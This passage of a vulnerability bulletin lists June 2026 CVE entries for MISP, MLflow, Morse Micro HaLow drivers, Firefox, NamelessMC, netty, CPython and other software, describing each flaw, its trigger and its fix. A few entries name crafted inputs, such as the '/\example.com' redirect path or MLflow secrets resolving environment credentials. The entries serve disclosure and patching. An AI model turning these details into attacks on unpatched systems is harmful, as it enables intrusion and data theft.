| misp--misp | An authorization flaw existed in the MISP Event Template Importer overwrite workflow. When importing an event template in overwrite mode, the application checked whether a matching template already existed but did not verify that the importing user belonged to the organization that owned the existing template. As a result, an authenticated user with access to the template import functionality could forcibly overwrite an event template owned by another organization. Successful exploitation could allow unauthorized modification of another organization's event template, potentially altering template structure, attributes, or metadata used for subsequent event creation or sharing workflows. Site administrators are not affected by this restriction, as they are explicitly allowed to overwrite templates across organizations. The issue was fixed by enforcing an ownership check before overwrite: non-site-admin users may only overwrite templates owned by their own organization. | 2026-06-04 | not yet calculated | CVE-2026-10855 | https://github.com/MISP/MISP/commit/7c2200d143bef86aaf58d701b6968a843097db69 |
| misp--misp | A URL validation flaw in the MISP dashboard button widget allowed a crafted relative-looking URL to be accepted as a local path while being interpreted by browsers as an external URL. The validation rejected URLs containing an explicit scheme, host, or user component, but did not reject paths beginning with a slash followed by a backslash, such as /\example.com. Some browsers normalize backslashes in URLs as forward slashes, which can turn this into a scheme-relative external navigation target. In addition, the generated href concatenated the reconstructed URL with the original URL, increasing the possibility of unsafe or malformed link generation. An attacker able to configure or influence a dashboard button URL could craft a button that appears to point inside the application but redirects users to an attacker-controlled site when clicked. This could be used for phishing, credential theft, or social engineering. The patch fixes the issue by rejecting empty paths and paths starting with /\, and by emitting only the reconstructed validated URL in the anchor href. | 2026-06-04 | not yet calculated | CVE-2026-10856 | https://github.com/MISP/MISP/commit/f879f16fb5db7a9aab0a70fdcafea12ce4847e9a |
| misp--misp | A logic error in the MISP CRUD component delete handler allowed validation failures to be bypassed when requests used the HTTP DELETE method. Due to missing parentheses in the delete condition, the expression was evaluated as ($validationError === null && POST) || DELETE, meaning a DELETE request could proceed even when the delete validation callback had rejected the operation. An authenticated attacker with access to an affected delete endpoint could abuse this flaw to delete records that should have been protected by application-level validation or authorization checks. | 2026-06-04 | not yet calculated | CVE-2026-10860 | https://github.com/MISP/MISP/commit/a5877559dc88ad7a0c935910a652c130489ae2bd |
| misp--misp | An open redirect vulnerability existed in MISP UsersController::routeafterlogin() because the value stored in the pre_login_requested_url session key was used as the post-login redirect destination without sufficiently enforcing that it was a local application path. An unauthenticated remote attacker could craft a link that causes a victim to visit a trusted MISP instance and, after successful authentication, be redirected to an attacker-controlled external URL. This could be abused to increase the credibility of phishing attacks, redirect users to counterfeit login pages, or deliver attacker-controlled content from an untrusted domain. CWE-601 describes this weakness as accepting user-controlled input that specifies an external link and using it in a redirect, with phishing as a common consequence. The patch mitigates the issue by decoding and parsing the URL, rejecting URLs with a scheme, host, user component, missing or non-local path, and protocol-relative forms such as //example.com and /\example.com. | 2026-06-04 | not yet calculated | CVE-2026-10861 | https://github.com/MISP/MISP/commit/ae760b7bf534f2798810d59a1f961b31adb3443e |
| misp--misp | A security issue was fixed in the correlations over-correlation endpoint where the order query parameter was accepted from user-controlled named request parameters. This allowed an authenticated user to override the server-defined ordering of over-correlating values. Depending on how the value was processed by the underlying data access layer, this could allow manipulation of database query ordering and potentially expose the application to unsafe query construction. The patch removes order from the set of request-controlled parameters and instead sets the ordering server-side to occurrence desc after processing allowed user parameters. Affected component: app/Controller/CorrelationsController.php, overCorrelations(). Security impact: An authenticated attacker could influence the ordering clause used by the over-correlations query. The direct impact appears limited to query manipulation unless further evidence confirms SQL injection or unauthorized data exposure through the manipulated ordering expression. | 2026-06-04 | not yet calculated | CVE-2026-10863 | https://github.com/MISP/MISP/commit/aa094a335ba2855f8a42a1dc44398f43560fe247 |
| misp--misp | A vulnerability in the MISP dashboard widgets allowed an authenticated user to manipulate the fields option and influence which fields were returned by the New Users and New Organisations widgets. In some cases, requesting a field set that became empty after validation or redaction could cause the underlying query to fall back to returning unintended model fields. For the New Users widget, this could allow a non-site-admin user to obtain user e-mail addresses even when user e-mail disclosure was disabled by configuration. For the New Organisations widget, crafted field selection could similarly result in unintended organisation fields being included in the dashboard response. The issue was caused by applying field filtering and redaction in a way that could leave the selected field list empty. The patch ensures that the allowed field list is built safely, that restricted fields such as user e-mail addresses are removed before user-supplied field selection is processed, and that an empty field selection falls back only to the permitted default fields. Impact: An authenticated low-privileged user with access to the affected dashboard widgets may be able to disclose restricted user or organisation metadata, including user e-mail addresses depending on configuration. | 2026-06-04 | not yet calculated | CVE-2026-10864 | https://github.com/MISP/MISP/commit/8722fda035b5b622de387ae1dd0159d71ff1e22e |
| misp--misp | A mass assignment vulnerability exists in the MISP user edit functionality due to insufficient filtering of user-supplied fields in UsersController::edit(). When processing edit requests, the application accepted a user-controlled User.id value from request data. An authenticated attacker could craft a modified request containing another user identifier, potentially causing updates to be applied to an unintended user account. Depending on the editable fields and the attacker's privileges, this could allow unauthorized modification of user account attributes and impact account integrity. The issue was addressed by explicitly removing the User.id field from request data before processing the user edit operation. | 2026-06-04 | not yet calculated | CVE-2026-10868 | https://github.com/MISP/MISP/commit/1be8c413b7104a889dfd30c5b1986e3ab17238e8 |
| mlflow--mlflow/mlflow | MLflow 3.9.0 with basic-auth (`--app-name basic-auth`) fails to enforce authorization checks for multiple Gateway API 'list' endpoints. Specifically, the `BEFORE_REQUEST_HANDLERS` dictionary in `mlflow/server/auth/__init__.py` does not include entries for `ListGatewaySecretInfos`, `ListGatewayEndpoints`, and `ListGatewayModelDefinitions`. This allows any authenticated user, regardless of their assigned permissions, to enumerate all gateway secrets, endpoints, and model definitions. This vulnerability exposes sensitive information, such as API keys, endpoint configurations, and proprietary model definitions, to unauthorized users. | 2026-06-02 | not yet calculated | CVE-2026-3198 | https://huntr.com/bounties/e57db731-97d3-40c3-a429-831ee959807f |
| mlflow--mlflow/mlflow | A vulnerability in mlflow/mlflow versions prior to 3.11.0 allows for the resolution of environment variables in AI Gateway secrets, which can be exploited to exfiltrate sensitive server-side environment credentials to an attacker-controlled endpoint. This issue arises because the `api_key` field in gateway secrets can accept `$ENV_VAR` references, which are resolved against the MLflow server's environment during runtime. The resolved secrets are then sent in provider authentication headers to the configured upstream `api_base`. This vulnerability can be exploited by low-privileged authenticated users in basic-auth deployments or by unauthenticated users in default deployments without `basic-auth`. The impact includes potential leakage of sensitive credentials such as cloud artifact credentials (`AWS_ACCESS_KEY_ID`, `AWS_SECRET_ACCESS_KEY`), which could lead to artifact poisoning and cross-boundary code execution in downstream environments. The issue is fixed in version 3.11.0. | 2026-06-03 | not yet calculated | CVE-2026-4035 | https://huntr.com/bounties/f8e591a0-0f19-4910-b82e-16c9956f2233 https://github.com/mlflow/mlflow/commit/4a3f2f720cb4f058c9e0c5b883e0acc9ab64a7f3 |
| Morse Micro--HaLowLink 2 | A heap-based buffer overflow vulnerability in the dot11ah.ko HaLow Wi-Fi kernel driver in Morse Micro HaLowLink 2 software versions prior to 2.11.13 allows an unauthenticated attacker within radio range to cause a Denial of Service (kernel panic) or potentially achieve Remote Code Execution via a crafted 802.11ah beacon or probe response frame containing a malformed S1G Capabilities Information Element (IE element ID 0xD9). The function morse_dot11ah_find_s1g_caps_for_bssid() uses the IE length field directly as the size argument to memcpy without validating it against the 15-byte destination buffer. An attacker can supply up to 255 bytes, causing an overflow of up to 240 bytes of attacker-controlled data into adjacent kernel heap memory. The vulnerability is triggerable during normal scanning without authentication, association, or user interaction. | 2026-06-05 | not yet calculated | CVE-2026-7762 | https://www.morsemicro.com/security-advisories/MM-SA-2026-002 |
| Morse Micro--HaLowLink 2 | A heap-based buffer overflow vulnerability in the morse.ko HaLow Wi-Fi kernel driver in Morse Micro HaLowLink 2 software versions prior to 2.11.13 allows an unauthenticated attacker within radio range to cause a Denial of Service (kernel panic) or potentially achieve Remote Code Execution via a crafted 802.11ah beacon frame containing a malformed Traffic Indication Map (TIM) Information Element. The function morse_page_slicing_process_tim_element() in page_slicing.c derives the TIM bitmap length directly from a received IE field without validating it against the fixed-size destination buffer before passing it to memset and memcpy operations, allowing up to 252 bytes of attacker-controlled data to be written beyond the buffer boundary. Because beacons are broadcast frames processed during passive scanning, no authentication, association, or user interaction is required. | 2026-06-05 | not yet calculated | CVE-2026-7763 | https://www.morsemicro.com/security-advisories/MM-SA-2026-001 |
| Morse Micro--HaLowLink 2 | An out-of-bounds read vulnerability in the morse.ko HaLow Wi-Fi kernel driver in Morse Micro HaLowLink 2 software versions prior to 2.11.12 allows an unauthenticated attacker within radio range to disclose a small amount of kernel heap memory or cause a Denial of Service (kernel oops/panic) via a crafted 802.11ah beacon or probe response frame containing a malformed Vendor Information Element. The function morse_vendor_find_vendor_ie() does not validate the IE length against the expected structure size before its result is passed to morse_vendor_rx_caps_ops_ie() and morse_vendor_fill_sta_vendor_info(), which read at fixed offsets into the IE data. Because the length check only requires the IE to be longer than 3 bytes, an attacker can supply an undersized IE, causing a heap out-of-bounds read of up to 9 bytes. No authentication, association, or user interaction is required. | 2026-06-04 | not yet calculated | CVE-2026-7764 | https://www.morsemicro.com/security-advisories/MM-SA-2026-003 |
| Mozilla--Firefox | Incorrect boundary conditions in the Graphics: Text component. This vulnerability was fixed in Firefox 151.0.3. | 2026-06-02 | not yet calculated | CVE-2026-10701 | https://bugzilla.mozilla.org/show_bug.cgi?id=2038537 https://www.mozilla.org/security/advisories/mfsa2026-54/ |
| Mozilla--Firefox | JIT miscompilation in the JavaScript Engine: JIT component. This vulnerability was fixed in Firefox 151.0.3. | 2026-06-02 | not yet calculated | CVE-2026-10702 | https://bugzilla.mozilla.org/show_bug.cgi?id=2040903 https://www.mozilla.org/security/advisories/mfsa2026-54/ |
| Mozilla--Firefox for iOS | Firefox for iOS Reader View replaced page content in its HTML template before replacing other internal placeholders. A malicious page could include a placeholder string that was later substituted with JSON-LD data, potentially resulting in arbitrary JavaScript execution. This vulnerability was fixed in Firefox for iOS 151.2. | 2026-06-01 | not yet calculated | CVE-2026-9308 | https://bugzilla.mozilla.org/show_bug.cgi?id=2039422 https://www.mozilla.org/security/advisories/mfsa2026-53/ |
| Mozilla--Firefox for iOS | Firefox for iOS Reader View did not properly escape HTML tags in JSON-LD metadata. A malicious page could inject markup that changed Reader View behavior and leaked sensitive URL parameters. These parameters could then be used to access internal pages, potentially resulting in arbitrary JavaScript execution in an internal origin. This vulnerability was fixed in Firefox for iOS 151.2. | 2026-06-01 | not yet calculated | CVE-2026-9309 | https://bugzilla.mozilla.org/show_bug.cgi?id=2036573 https://www.mozilla.org/security/advisories/mfsa2026-53/ |
| NamelessMC--Nameless | NamelessMC is website software for Minecraft servers. In version 2.2.4, `modules/Forum/pages/forum/get_quotes.php` only checks whether the caller is logged in, then reads a post by attacker-controlled `post` ID and returns its content. The backend helper in `modules/Forum/classes/Forum.php` does not enforce forum or topic ACLs. In contrast, the normal topic page in `modules/Forum/pages/forum/view_topic.php` enforces forum visibility and `view_other_topics`. Any low-privileged authenticated user can enumerate post IDs and read content from hidden, private, or staff-only forums. Version 2.2.5 fixes the issue. | 2026-06-02 | not yet calculated | CVE-2026-33398 | https://github.com/NamelessMC/Nameless/security/advisories/GHSA-2r6x-cv4f-h8fx |
| NamelessMC--Nameless | NamelessMC is website software for Minecraft servers. In version 2.2.4, `modules/Forum/classes/ForumPostReactionContext.php` only verifies that the caller can view the forum, but it does not re-enforce topic-level `view_other_topics` authorization. As a result, in forums where users may enter the forum but may only view their own topics, reactions can still be read and modified on other users' topics. Version 2.2.5 fixes the issue. | 2026-06-02 | not yet calculated | CVE-2026-35443 | https://github.com/NamelessMC/Nameless/security/advisories/GHSA-wcrf-5gcp-pf64 |
| NamelessMC--Nameless | NamelessMC is website software for Minecraft servers. In version 2.2.4, the profile page (modules/Core/pages/profile.php) processes wall post submissions and replies before verifying whether the viewer is authorized to access the profile. This allows any user with the profile.post permission to write wall posts to private or blocking profiles. Additionally, the reply branch does not verify that the target wall post belongs to the current profile, enabling attackers to inject replies into arbitrary wall posts owned by other profiles via a restricted profile URL. This is patched in version 2.2.5. | 2026-06-02 | not yet calculated | CVE-2026-35447 | https://github.com/NamelessMC/Nameless/security/advisories/GHSA-c9xj-rxgw-g2hq |
| NamelessMC--Nameless | NamelessMC is website software for Minecraft servers. In version 2.2.4, `core/classes/Misc/ProfilePostReactionContext.php` only verifies that the wall post exists and does not enforce blocked/private-profile visibility. `modules/Core/queries/reactions.php` allows unauthenticated GET requests for reaction details. This means that unauthenticated visitors can read reaction participants and timestamps for private profile posts and authenticated low-privileged users can add reactions to private or blocking profile posts. Version 2.2.5 fixes the issue. | 2026-06-02 | not yet calculated | CVE-2026-40314 | https://github.com/NamelessMC/Nameless/security/advisories/GHSA-55q9-8qm3-4grc |
| NamelessMC--Nameless | NamelessMC is website software for Minecraft servers. In version 2.2.4, `core/classes/Misc/ProfilePostReactionContext.php` only verifies that the wall post exists and does not enforce blocked/private-profile visibility. This means that authenticated low-privileged users can add reactions to private or blocking profile posts. Version 2.2.5 contains a patch. | 2026-06-02 | not yet calculated | CVE-2026-40571 | https://github.com/NamelessMC/Nameless/security/advisories/GHSA-47hr-jj6c-rqf9 |
| NETAPP--Active IQ Config Advisor | Active IQ Config Advisor version 6.7.3 contains hard-coded credentials that could allow an authenticated attacker with low privileges to perform unauthorized AutoSupport operations. | 2026-06-03 | not yet calculated | CVE-2026-22054 | https://security.netapp.com/advisory/ntap-20260603-0001 |
| NETAPP--Active IQ OneCollect | Active IQ OneCollect version 2.7.3 contains hard-coded credentials that could allow an authenticated attacker with low privileges to perform unauthorized AutoSupport operations. | 2026-06-03 | not yet calculated | CVE-2026-22055 | https://security.netapp.com/advisory/ntap-20260603-0002 |
| netty--netty-incubator-codec-ohttp | The netty incubator codec.bhttp is a java language binary http parser. Prior to version 0.0.21.Final, HKDF_expand returns non-NULL on failure. The byte[] is filled with zeros and has no way to distinguish success from failure. Since this output is used as HKDF key material for the response AEAD, a failure silently produces an all-zero key. When EVP_HPKE_CTX_export fails it also returns an empty byte[] array filled with zeros. This byte[] feeds directly into OHttpCrypto.createResponseAEAD(...). A silent all-zero export secret would produce a deterministic, attacker-predictable AEAD key. Version 0.0.21.Final patches the issue. | 2026-06-04 | not yet calculated | CVE-2026-41207 | https://github.com/netty/netty-incubator-codec-ohttp/security/advisories/GHSA-f659-372h-6x3x https://github.com/netty/netty-incubator-codec-ohttp/commit/3d3b4e527fc82ad0fe3db1af951ffd0ec9a10680 |
| netty--netty-incubator-codec-ohttp | The netty incubator codec.bhttp is a java language binary http parser. The library implements Oblivious HTTP (RFC 9458) using BoringSSL's HPKE C library via JNI. When deriving native memory addresses for cryptographic operations versions prior to 0.0.22.Final provide a fallback path for direct ByteBufs that do not expose their memory address through `hasMemoryAddress()`. This fallback occurs when `sun.misc.Unsafe` is unavailable to Netty - for example, when the JVM is started with `-Dio.netty.noUnsafe=true`, when a SecurityManager restricts Unsafe access, or when running on non-HotSpot JVMs. In these configurations, Netty's default `PooledByteBufAllocator` returns `PooledDirectByteBuf` instances for which `hasMemoryAddress()` returns false. Under the enabling JVM configuration, an unauthenticated network attacker can cause the OHTTP gateway to corrupt memory belonging to other concurrent connections and disclose the contents of adjacent pooled direct buffers by triggering cryptographic operations with crafted OHTTP requests. The corruption occurs regardless of whether the AEAD tag verification succeeds, as BoringSSL zeroizes the output buffer on failure. The information disclosure path provides the attacker with the encryption key needed to extract the leaked data. This violates the confidentiality and integrity of all connections sharing the same Netty buffer arena. Version 0.0.22.Final fixes the issue. | 2026-06-04 | not yet calculated | CVE-2026-48040 | https://github.com/netty/netty-incubator-codec-ohttp/security/advisories/GHSA-32hf-8jw3-v4qq https://github.com/netty/netty-incubator-codec-ohttp/commit/7ad38d5cc2827af7e067e5c1e1ac37cd4566dad9 |
| netty--netty-incubator-codec-ohttp | The netty incubator codec.bhttp is a java language binary http parser. Prior to version 0.0.22.Final, the codec-ohttp implementation of draft-ietf-ohai-chunked-ohttp does not verify that a cryptographically-signed final chunk was received before the outer HTTP body terminates. An on-path adversary (the OHTTP relay itself, or any MITM on the relay↔gateway or relay↔client transport) can forward a prefix of a legitimate chunked-OHTTP message, cut at a non-final chunk boundary, and close the outer body cleanly, producing no decryption error and no exception in the receiving application. Version 0.0.22.Final fixes the issue. | 2026-06-04 | not yet calculated | CVE-2026-48480 | https://github.com/netty/netty-incubator-codec-ohttp/security/advisories/GHSA-r6fj-869h-4f6q https://github.com/netty/netty-incubator-codec-ohttp/commit/28f977f293591a4e837bd59ceb441f9f70349915 |
| Northern.tech--CFEngine Enterprise | Northern.tech CFEngine Enterprise 3.24.3 before 3.24.4 and 3.27.0 before 3.27.1 allows XSS. | 2026-06-02 | not yet calculated | CVE-2026-33553 | https://Northern.tech https://cfengine.com/blog/2026/cve-2026-33553-xss-in-mission-portal/ |
| OALDERS--HTML::Entities | HTML::Entities versions before 3.84 for Perl read freed heap memory in _decode_entities. The XS routine backing HTML::Entities::_decode_entities cached a pointer (repl) into the entity-value SV returned by hv_fetch on the entity2char hash. When the input SV was identical to a value SV in that hash, and that value contained its own key as an entity reference, a later call to grow_gap() reallocated the SV's PV buffer and freed the backing allocation that repl still pointed into. The subsequent copy loop read repl_len bytes from the freed allocation. The read may disclose adjacent heap contents into the destination SV. | 2026-06-04 | not yet calculated | CVE-2026-8829 | https://github.com/libwww-perl/HTML-Parser/pull/56 https://github.com/libwww-perl/HTML-Parser/commit/6922552b0778c90a9587a3894e248be4d3a25e1c.patch |
| Octopus Deploy--Octopus Server | In affected versions of Octopus Server, permissions were not checked correctly resulting in any authenticated user being able to make server level changes using a certain API endpoint despite receiving an error. | 2026-06-04 | not yet calculated | CVE-2026-4881 | https://advisories.octopus.com/post/2026/sa2026-04 |
| Open vSwitch--Open vSwitch | A missing upper-bound check in the udpif_set_threads() function of Open vSwitch v3.6.90 allows an attacker with OVSDB write access to request an excessive number of handler or revalidation threads. This can cause a denial of service (DoS) via resource exhaustion. | 2026-06-04 | not yet calculated | CVE-2026-36499 | https://github.com/majdlatah/OVS-Other-Config-Bug |
| open-telemetry--go.opentelemetry.io/otel/schema/v1.1 | OpenTelemetry-Go is the Go implementation of OpenTelemetry. Prior to version 0.0.17, `go.opentelemetry.io/otel/schema/v1.0` and `go.opentelemetry.io/otel/schema/v1.1` leaks one file descriptor on each successful `ParseFile` call. `ParseFile` opens the schema file and passes it to `Parse` without closing it; repeated parsing in a long-running process can exhaust the process file descriptor limit and cause denial of service. Exploitation depends on a consuming application exposing repeated schema parsing to an attacker-controlled path. Version 0.0.17 contains a patch for the issue. | 2026-06-04 | not yet calculated | CVE-2026-45287 | https://github.com/open-telemetry/opentelemetry-go/security/advisories/GHSA-995v-fvrw-c78m https://github.com/open-telemetry/opentelemetry-go/commit/e72a235518cb773137efd80336a179028bc34684 https://github.com/open-telemetry/opentelemetry-go/commit/f12d198f161b61735d65705248715aa97021ba8d |
| OpenAI--OpenAI Atlas | OpenAI Atlas before 1.2025.288.15 exposed privileged browser APIs to web content on *.openai.com origins. A cross-site scripting vulnerability in forum.openai.com could be used to access these functions, allowing access to browser history information and the ability to open or close tabs. OpenAI Atlas 1.2025.288.15 narrows access to these APIs to *.chatgpt.com; users should upgrade to 1.2025.288.15 or later. | 2026-06-05 | not yet calculated | CVE-2026-11326 | Pwning OpenAI Atlas Through Exposed Browser Internals |
| OpenAirInterface5G--OpenAirInterface5G 2.4.0 | An issue was discovered in OpenAirInterface5G 2.4.0 (nr-softmodem) in the E2SM-KPM RAN Function's PRB utilization metric calculation. The functions fill_RRU_PrbTotDl() and fill_RRU_PrbTotUl() in openair2/E2AP/RAN_FUNCTION/O-RAN/ran_func_kpm_subs.c (lines 182 and 197) compute PRB usage percentages by dividing by the difference of two consecutive total_prb_aggregate samples without checking for zero. When a malicious xApp sends a high volume of E42_RIC_SUBSCRIPTION_REQUESTs via the FlexRIC iApp (port 36422/SCTP), the E2 Agent generates KPM Indication reports at high frequency. If two consecutive sampling intervals yield identical PRB aggregate values, the divisor becomes zero, triggering SIGFPE and crashing the entire 5G base station process (nr-softmodem). This results in complete 5G cell service interruption for all connected UEs. No authentication is required. | 2026-06-01 | not yet calculated | CVE-2026-37232 | https://gitlab.eurecom.fr/oai/openairinterface5g https://github.com/MinamiKotor1/oran-security-advisories-zhongnan-luo/blob/main/advisories/CVE-2026-37232.md |
| OpenCTI-Platform--opencti | OpenCTI is an open source platform for managing cyber threat intelligence knowledge and observables. Versions prior to 7.260227.0 are vulnerable to XSS in the rendering of email-message observable body data. The content of the body field isn't appropriately sanitized when being rendered. Exploitation requires user interaction, but the payload could be delivered by someone sharing STIX data or through any of the ingesters. This could lead to CSRF and then large scale session theft. Version 7.260227.0 contains a fix. | 2026-06-02 | not yet calculated | CVE-2026-35212 | https://github.com/OpenCTI-Platform/opencti/security/advisories/GHSA-rg6r-x26x-63vq |
| openlabs--openlabs | An OS command injection vulnerability in the app.py component of openlabs docker-wkhtmltopdf-aas up to commit 9f50579 allows attackers to execute arbitrary commands via a crafted POST request. | 2026-06-03 | not yet calculated | CVE-2026-36576 | https://github.com/openlabs/docker-wkhtmltopdf-aas/issues/36 https://github.com/openlabs/docker-wkhtmltopdf-aas https://github.com/openlabs/docker-wkhtmltopdf-aas/blob/9f505797671c3339520dec5fc01dff3a6f324f2e/app.py#L40 https://hub.docker.com/r/openlabs/docker-wkhtmltopdf-aas |
| OpenStack--oslo.messaging | An issue was discovered in OpenStack oslo.messaging 1.0.0 through 17.3.0. The oslo.messaging RabbitMQ driver does not perform TLS hostname verification when connecting to the message broker. When ssl_ca_file is configured, the driver enables certificate chain validation but does not pass the expected broker hostname into the underlying TLS stack. Any certificate signed by the deployment CA is accepted regardless of hostname, allowing an attacker who can intercept control-plane traffic to impersonate the RabbitMQ broker and perform a man-in-the-middle attack on RPC and notification traffic. All OpenStack services using oslo.messaging with RabbitMQ over TLS are affected. | 2026-06-04 | not yet calculated | CVE-2026-44393 | https://bugs.launchpad.net/oslo.messaging/+bug/2150316 https://wiki.openstack.org/wiki/OSSN/OSSN-0096 |
| prefecthq--prefecthq/prefect | In version 3.6.19 of prefecthq/prefect, an authentication bypass vulnerability exists due to the improper handling of URL path exemptions for health check probes. Specifically, the authentication middleware exempts any URL path ending with 'health' or 'ready' from authentication checks. This allows an attacker to create resources with names ending in 'health' or 'ready' and access them without authentication. Affected endpoints include those for variables, flows, work pools, work queues, and deployments. This vulnerability can lead to unauthorized access to sensitive information, such as API keys and database credentials, stored in Prefect Variables. | 2026-06-02 | not yet calculated | CVE-2026-3514 | https://huntr.com/bounties/c540e5e1-f74f-44f4-bfa0-9764ff6daa75 https://github.com/prefecthq/prefect/commit/e21617125335025b4b27e7d6f0ca028e8e8f3b79 |
| projectcapsule--capsule | Capsule is a multi-tenancy and policy-based framework for Kubernetes. The Capsule Controller runs with cluster-admin privileges. Although the TenantResource RawItems processing logic forcibly sets the namespace, this is ineffective for cluster-scoped resources. Prior to version 0.13.0, tenant administrators can leverage the Controller's elevated privileges to create cluster-scoped resources (such as ClusterRole and ValidatingWebhookConfiguration) that they cannot create directly, achieving cross-tenant privilege escalation and cluster-level attacks. The attack vector has a few limiting factors. This attack requires Tenant Owner privileges and requires Capsule Controller running with cluster-admin privileges (default configuration). Additionally, some clusters may have additional admission controllers blocking malicious resources. Version 0.13.0 patches this issue. | 2026-06-01 | not yet calculated | CVE-2026-22872 | https://github.com/projectcapsule/capsule/security/advisories/GHSA-qjjm-7j9w-pw72 https://github.com/projectcapsule/capsule/releases/tag/v0.13.0 |
| ProjectsAndPrograms--school-management-system | ProjectsAndPrograms school-management-system is vulnerable to Stored Cross-Site Scripting (XSS) in multiple attributes of students and teachers objects. An authorized attacker (e.g., a teacher or administrator) can inject malicious JavaScript that is subsequently executed in other users' browsers. Critically, when chained with CVE-2025-11661, which allows unauthenticated access to backend endpoints, this vulnerability can be exploited by a remote attacker without privileges to inject and execute arbitrary JavaScript. The maintainers were notified early about this vulnerability but did not provide details regarding affected versions. The version corresponding to commit 6b6fae5 was tested and confirmed vulnerable; other versions were not tested and may also be affected. | 2026-06-03 | not yet calculated | CVE-2026-47324 | https://cert.pl/en/posts/2026/06/CVE-2026-47324/ https://oranbyte.com/projects/school-management-system |
| ProjectsAndPrograms--school-management-system | ProjectsAndPrograms school-management-system uses predictable credentials by generating student's and teacher's passwords solely from the user's date of birth (e.g., 12072000 for 12 July 2000). The application does not require or prompt users to change the password upon first login. This behavior allows attackers to easily guess or derive valid credentials, leading to unauthorized account access. The maintainers were notified early about this vulnerability but did not provide details regarding affected versions. The version corresponding to commit 6b6fae5 was tested and confirmed vulnerable; other versions were not tested and may also be affected. | 2026-06-03 | not yet calculated | CVE-2026-47325 | https://cert.pl/en/posts/2026/06/CVE-2026-47324/ https://oranbyte.com/projects/school-management-system |
| pterodactyl--panel | Pterodactyl is a free, open-source game server management panel. Prior to version 1.12.3, the Pterodactyl Client API has a logic flaw that lets users bypass their assigned limits for database allocations. This happens because the database locking mechanism used in the controllers is totally broken and doesn't actually lock anything. Version 1.12.3 patches the issue. | 2026-06-02 | not yet calculated | CVE-2026-35202 | https://github.com/pterodactyl/panel/security/advisories/GHSA-fgmm-w5cx-vrfw |
| Python Packaging Authority--pip | pip would treat console_scripts and gui_scripts as paths instead of file names without sanitizing the resolved absolute path to the installation directory, leading to entry points being installed outside the installation directory. | 2026-06-01 | not yet calculated | CVE-2026-8643 | https://github.com/pypa/pip/pull/14000 https://mail.python.org/archives/list/security-announce@python.org/thread/YV63UET5D3OOJY7O4M5XCVYO2YM4NBYJ/ |
| Python Software Foundation--CPython | unicodedata.normalize() can take excessive CPU time when processing specially crafted Unicode input containing long runs of combining characters with alternating Canonical Combining Class values. This affects all normalization forms. | 2026-06-03 | not yet calculated | CVE-2026-3276 | https://mail.python.org/archives/list/security-announce@python.org/thread/PP5HB4K7727OBBM76KA2ILID76K3OZGZ/ https://github.com/python/cpython/pull/149080 https://github.com/python/cpython/issues/149079 https://github.com/python/cpython/commit/6b505d1f41f8f3ea0fe5a4786d3a8fff1875cfc0 https://github.com/python/cpython/commit/991224b1e8311c85f198f6dd8208bf8cff7fc26f https://github.com/python/cpython/commit/ba785b88add96acbf403d65cb157fb2743a33a32 https://github.com/python/cpython/commit/c5512bd7c1dc28055660565275012766941d3066 |
| Python Software Foundation--CPython | tarfile.data_filter could be bypassed using crafted link entries, including symlinks with empty or directory-like names, to redirect later archive members outside the intended extraction directory. This allowed a malicious tar archive to cause tarfile.extractall() to write files outside the destination directory, subject to the permissions of the extracting process. | 2026-06-04 | not yet calculated | CVE-2026-7774 | https://github.com/python/cpython/pull/149487 https://github.com/python/cpython/issues/149486 https://mail.python.org/archives/list/security-announce@python.org/thread/4FU62L2M6RMMHT2QPGQNPEHHUND7CEX5/ |
| QOS.CH Sarl--logback | Deserialization of untrusted data vulnerability in QOS.CH Sarl logback logback-core (HardenedObjectInputStream (logback-core) modules) allows Object Injection, albeit heavily restricted. More precisely, an attacker able to influence serialized data sent to SimpleSocketServer or SimpleSSLSocketServer can instantiate Proxy objects. Although deserialization is heavily restricted by HardenedObjectInputStream and no practical way to achieve remote code execution or significant privilege escalation has been identified, this issue constitutes a bypass of the intended security restrictions. This issue affects logback: through 1.5.33 inclusive. | 2026-06-01 | not yet calculated | CVE-2026-10532 | https://logback.qos.ch/news.html#1.5.34 |
| remix-run--react-router | React Router is a router for React. In versions 7.0.0 through 7.14.0 and 6.7.0 through 6.30.3, certain URLs passed to the redirect function can trigger an open redirect to an external domain due to path values starting with // being reinterpreted as protocol-relative URLs. The level of impact depends on the validation done by the application prior to returning the redirect. This does not impact applications using Declarative Mode (<BrowserRouter>). This is patched in versions 7.14.1 and 6.30.4. | 2026-06-02 | not yet calculated | CVE-2026-40181 | https://github.com/remix-run/react-router/security/advisories/GHSA-2j2x-hqr9-3h42 |
| Roche Diagnostics--navify Digital Pathology | Use of default credentials vulnerability in Roche Diagnostics navify Digital Pathology (RabbitMQ Management interface modules) allows Default Usernames and Passwords. This issue affects navify Digital Pathology: from 2.0.0 before 2.4.1. | 2026-06-02 | not yet calculated | CVE-2026-9844 | https://diagnostics.roche.com/global/en/legal/product-security-advisory.html |
| RockRMS--RockRMS v16.13 | RockRMS v16.13 and before v17.7.0 is vulnerable to Cross Site Scripting (XSS) via Social Media links in the user profile. | 2026-06-03 | not yet calculated | CVE-2026-36748 | http://sparkdevnetwork.com https://raxis.com/blog/cve-2026-36748-xss-in-rock-rms-leads-to-privilege-escalation/ |
| RRWO--Net::CIDR::Set | Net::CIDR::Set versions through 0.20 for Perl accept non-ASCII IP addresses and netmasks. Unicode digits such as the Arabic-Indic One (U+0661) were accepted but not properly parsed as numbers. This could allow network masks to accept larger networks. | 2026-06-04 | not yet calculated | CVE-2026-49940 | https://metacpan.org/release/RRWO/Net-CIDR-Set-0.21/changes https://nvd.nist.gov/vuln/detail/CVE-2025-40911 |
| RRWO--Net::CIDR::Set | Net::CIDR::Set versions through 0.20 for Perl did not validate IP addresses. The add method called the _encode method to parse addresses. If the addresses did not look like netmasks or network ranges, then they were assumed to be single IP addresses and passed back to itself as a 32-bit or 128-bit netmask. If the argument was not a well-formed IP address, then this would lead to indefinite recursion. An attacker could use this to cause a denial of service. | 2026-06-04 | not yet calculated | CVE-2026-49941 | https://metacpan.org/release/RRWO/Net-CIDR-Set-0.21/changes |
| RRWO--Net::CIDR::Set | Net::CIDR::Set versions through 0.20 for Perl did not validate network masks. The mask portion of a network mask could contain Unicode digits such as the Arabic-Indic One (U+0661), or non-digits, which were ignored. This could allow network masks to accept larger networks. Leading zeros were also accepted, but treated as decimal instead of octal. This could lead to confusion about what networks are acceptable. | 2026-06-04 | not yet calculated | CVE-2026-49942 | https://metacpan.org/release/RRWO/Net-CIDR-Set-0.21/changes https://nvd.nist.gov/vuln/detail/CVE-2025-40911 https://nvd.nist.gov/vuln/detail/CVE-2026-45191 |
